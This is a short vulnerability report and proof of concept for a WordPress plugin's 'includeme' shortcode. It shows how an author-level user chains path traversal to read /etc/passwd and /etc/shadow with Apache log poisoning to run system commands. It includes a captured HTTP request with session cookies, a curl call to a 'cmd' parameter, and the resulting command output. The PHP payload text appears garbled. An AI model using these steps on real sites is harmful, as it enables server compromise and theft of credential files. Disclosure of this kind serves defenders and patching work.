The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure

PoC

RCE through chaining LFI with log poisoning # 1. Path Traversal / Local File Inclusion # Authenticate as any user, which can create blog posts on wordpress # for example, user with “author” role # create a new wordpress blog post # copy paste the following content on your blog post and visit your newly created page: [includeme file=“/…/…/…/…/etc/passwd” value=“This is a basic path traversal poc”] # contents of /etc/passwd will be displayed # 2. log poisoning # PoC was constructed with the LAMPP stack on Ubuntu 20.04 LTS. LAMPP has the apache2 error log file under /opt/lampp/logs/error_log, which will be used for demonstration purpose # however, please note that the default apache2 log can be found under /var/log/apache2/access.log # if you don’t use the LAMPP stack, please use /var/log/apache2/access.log for the log poisoning part # reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/ # First, we are trying to open a restricted file like /etc/shadow to get an entry on /opt/lampp/logs/error_log. The “error_log” file is reflecting the HTTP “referrer” header, therefore we can inject arbitrary PHP functions into the “referrer” to get Remote Code Execution # open Burp Suite to intercept the request, append the payload to the “referrer” field # payload (without the quotes): “;” POST /wordpress/wp-json/wp/v2/posts/116?_locale=user HTTP/1.1 Host: localhost Content-Length: 303 Accept: application/json, /;q=0.1 X-WP-Nonce: 7eb92e9895 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9 X-HTTP-Method-Override: PUT Content-Type: application/json Origin: http://localhost Referer: http://localhost/wordpress/wp-admin/post.php?post=116&action;=edit; Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5d1e5a05b96398a14a61f963d4699ca9=BossisBack%7C1624379188%7CafC9qioiHNrTPEtqjzjgXuW96F0014a9TLOBz8b0phV%7C2e28994b4d0cd0574000263018f2f266877b3124fb65c91f63e49ea6df92b095; wp-settings-2=mfold%3Do; wp-settings-time-2=1624206389 dnt: 1 sec-gpc: 1 Connection: close {“id”:116,“content”:"\n

test page

\n\n\n\n[includeme file="…/…/…/…/etc/shadow" value="My name is Stefano"]\n\n\n\n

\n"} # on the same blog post, change the file back to [includeme file=“…/…/…/…/opt/lampp/logs/error_log” value=“test”] # now, the GET parameter “cmd” can be used to execute system commands # append “?cmd=id” to the URL of your published blog post # for example: $ curl http://localhost/wordpress/2021/06/20/myblogpost/?cmd=id # uid=33(www-data) gid=33(www-data) groups=33(www-data)